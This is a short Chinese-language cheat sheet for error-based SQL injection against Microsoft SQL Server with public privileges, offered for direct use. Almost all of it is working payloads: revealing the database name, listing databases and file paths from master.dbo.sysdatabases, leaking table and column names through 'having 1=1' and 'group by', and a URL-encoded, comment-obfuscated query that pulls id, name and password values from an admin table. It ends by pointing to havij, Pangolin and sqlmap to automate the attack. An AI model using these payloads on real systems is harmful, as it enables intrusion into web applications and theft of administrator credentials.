mssql数据库注入-public权限

获取数据库名字

and db_name()=0--

获取所有数据库名和路径

%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(256))%2bchar(94)%2bcast([filename]%20as%20nvarchar(256))%20from%20(select%20top%202%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--

 获得表名

having 1=1--

 用的到的字段继续

group by admin.id having 1=1--

group by admin.id,admin.name having 1=1--

 

用获得的数据库名，表名，字段名得到字段内容

/**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))%3E0/**/and/**/1=1

 

 这种操作比较慢，可以用havij、穿山甲、sqlmap工具